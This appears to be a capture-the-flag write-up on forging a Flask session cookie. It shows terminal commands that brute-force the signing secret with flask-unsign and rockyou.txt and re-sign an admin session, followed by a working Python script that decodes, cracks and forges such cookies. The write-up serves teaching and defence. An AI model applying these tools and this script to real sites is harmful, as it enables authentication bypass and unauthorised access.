1. I first thought that the only thing I had to do was change the first part of the cookie, since in the inspector we can see it's base64 encoded. ![](https://hackmd.io/_uploads/S1jo6QX3h.png) But if we only modify the first part, we get an endless redirection. ![](https://hackmd.io/_uploads/Byxg1EXnn.png)

2. I went looking for an encoder for `flask cookie`s and found [this tool](https://github.com/noraj/flask-session-cookie-manager). Although [it can be installed with pip](https://pypi.org/project/flask-session-cookie-manager/) (`pip install flask-session-cookie-manager`), I ended up with the script in a folder under my working directory: since I was working in my home directory, it's at `/home/kali/flask-session-cookie-manager/`. To use it, we change into that directory and run the script like this:

   ```shell
   ┌──(kali㉿kali)-[~]
   └─$ cd flask-session-cookie-manager

   ┌──(kali㉿kali)-[~/flask-session-cookie-manager]
   └─$ python3 flask_session_cookie_manager3.py decode -c "eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.ZNWgGA.WyB3UkvYYXXQp-kudiDAPv-iNlE"
   b'{"very_auth":"blank"}'
   ```

3. However, generating a new cookie [requires a "secret key"](https://github.com/noraj/flask-session-cookie-manager#encode). I searched for "brute-force flask secret key" online and found this tool: https://pypi.org/project/flask-unsign/.

4. When I ran `pip install flask-unsign[wordlist]`, I got a warning: *"WARNING: The script flask-unsign is installed in '/home/kali/.local/bin' which is not on PATH."* So we have to add that directory to PATH with `export PATH="/home/kali/.local/bin:$PATH"`, and we can check that it was added with `echo $PATH`. (`export` only affects the current shell; put the same line in `~/.zshrc` or `~/.bashrc` if you want it to stick.)

   ```shell
   ┌──(kali㉿kali)-[~]
   └─$ export PATH="/home/kali/.local/bin:$PATH"

   ┌──(kali㉿kali)-[~]
   └─$ echo $PATH
   /home/kali/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games
   ```

5. Initially, I used the default wordlist to brute force the secret key, but in vain.

   ```shell
   ┌──(kali㉿kali)-[~]
   └─$ flask-unsign --unsign --cookie "eyJ2ZXJ5X2F1dGgiOiJjaG9jb2xhdGUgY2hpcCJ9.ZNWpoQ.xgynm9v1lfHCKV6BkoAMo5dhVGE"
   [*] Session decodes to: {'very_auth': 'chocolate chip'}
   [*] No wordlist selected, falling back to default wordlist..
   [*] Starting brute-forcer with 8 threads..
   [*] Attempted (2176): -----BEGIN PRIVATE KEY-----ECR
   [*] Attempted (33664): Od(QyNieZgadnieszpiKeyge with-
   [*] Attempted (39040): b_9#y2L"F4Q8ziqwm6yr(qtr6)df6)
   [!] Failed to find secret key after 53994 attempts.
   ```

   Fortunately, I found that [this site](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/flask#brute-force) suggests using `rockyou.txt`, and it worked!

   ```shell
   ┌──(kali㉿kali)-[~]
   └─$ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie 'eyJ2ZXJ5X2F1dGgiOiJjaG9jb2xhdGUgY2hpcCJ9.ZNWpoQ.xgynm9v1lfHCKV6BkoAMo5dhVGE' --no-literal-eval
   [*] Session decodes to: {'very_auth': 'chocolate chip'}
   [*] Starting brute-forcer with 8 threads..
   [+] Found secret key after 6272 attempts
   b'fortune'
   ```

6. Since we know that the `flag` function is triggered by `{"very_auth":"admin"}` on `GET /display` (shown in `server.py`), we have to encode `{"very_auth":"admin"}` with the key `fortune`:

   ```shell
   ┌──(kali㉿kali)-[~/flask-session-cookie-manager]
   └─$ python3 flask_session_cookie_manager3.py encode -s 'fortune' -t '{"very_auth":"admin"}'
   eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.ZNWrYw.4IHyLGO9FOkd4fKyJPz8klzIyds
   ```

7. Paste what we got into the request and forward it. ![](https://hackmd.io/_uploads/H1b0LNXh2.png) Here we go! ![](https://hackmd.io/_uploads/SJbA84mn2.png)
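To show what the two tools above are actually doing, here is an added example (not part of the original write-up, and not code from flask-unsign or flask-session-cookie-manager) that reimplements Flask's session-cookie scheme with only the Python standard library: the payload is URL-safe base64 of compact JSON, the second segment is a base64 timestamp, and the third is HMAC-SHA1 over `payload.timestamp` keyed with HMAC-SHA1(secret_key, "cookie-session"), which is how `itsdangerous.URLSafeTimedSerializer` is configured by Flask. The cookies are the ones captured in the steps above; the word list is a constructed stand-in for `rockyou.txt`, so the key is found on the fourth guess. The point to take away is that the first segment needs no key to read, and that the signature is the only thing stopping you from editing it, so once the secret is guessable the whole session is forgeable.

```python
"""Decode, brute-force and re-sign a Flask session cookie with the standard library only."""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Iterable, Optional

# Flask's SecureCookieSessionInterface hard-codes these when it builds the itsdangerous serializer.
SALT = b"cookie-session"
SEP = b"."


def b64_encode(raw: bytes) -> bytes:
    """URL-safe base64 with the '=' padding stripped, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def b64_decode(data: bytes) -> bytes:
    """Inverse of b64_encode: restore padding before decoding."""
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def derive_key(secret_key: bytes) -> bytes:
    """key_derivation='hmac': the signing key is HMAC-SHA1(secret_key, salt)."""
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def sign(secret_key: bytes, value: bytes) -> bytes:
    """Base64 HMAC-SHA1 over 'payload.timestamp' with the derived key."""
    return b64_encode(hmac.new(derive_key(secret_key), value, hashlib.sha1).digest())


def decode_payload(cookie: str) -> dict:
    """Read the session data without any key: it is only base64 (plus zlib if it starts with '.')."""
    payload = cookie.encode().rsplit(SEP, 2)[0]
    if payload.startswith(b"."):  # itsdangerous marks a compressed payload with a leading dot
        return json.loads(zlib.decompress(b64_decode(payload[1:])))
    return json.loads(b64_decode(payload))


def verify(cookie: str, secret_key: bytes) -> bool:
    """True if the third segment is a valid signature of the first two under secret_key."""
    payload, timestamp, signature = cookie.encode().rsplit(SEP, 2)
    expected = sign(secret_key, payload + SEP + timestamp)
    return hmac.compare_digest(expected, signature)


def brute_force(cookie: str, wordlist: Iterable[str]) -> Optional[bytes]:
    """What flask-unsign does: try each candidate as the secret key until verify() succeeds.
    For a real file use open(path, errors="ignore") and pass the file object as the wordlist."""
    for candidate in wordlist:
        key = candidate.rstrip("\r\n").encode()
        if verify(cookie, key):
            return key
    return None


def forge(secret_key: bytes, session: dict, timestamp: Optional[int] = None) -> str:
    """Re-sign arbitrary session data exactly the way the server would."""
    payload = b64_encode(json.dumps(session, separators=(",", ":")).encode())
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = b64_encode(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    body = payload + SEP + ts_b64
    return (body + SEP + sign(secret_key, body)).decode()


# Cookie captured in the write-up (the 'chocolate chip' session).
CAPTURED = "eyJ2ZXJ5X2F1dGgiOiJjaG9jb2xhdGUgY2hpcCJ9.ZNWpoQ.xgynm9v1lfHCKV6BkoAMo5dhVGE"
# Constructed stand-in for rockyou.txt: a few wrong guesses followed by the real key.
WORDLIST = ["password", "123456", "cookie", "fortune", "admin"]

if __name__ == "__main__":
    print("session:", decode_payload(CAPTURED))
    key = brute_force(CAPTURED, WORDLIST)
    print("secret key:", key)
    print("forged:", forge(key, {"very_auth": "admin"}))
```

Passing the timestamp from the write-up's forged cookie (`ZNWrYw`, i.e. `0x64d5ab63`) to `forge()` reproduces that cookie byte for byte, which is a quick way to confirm the reimplementation matches the tools before trusting it on a new target. On the defensive side, the same code shows why the fix is a long random `SECRET_KEY`: nothing about the cookie format changes, only the cost of the guessing loop.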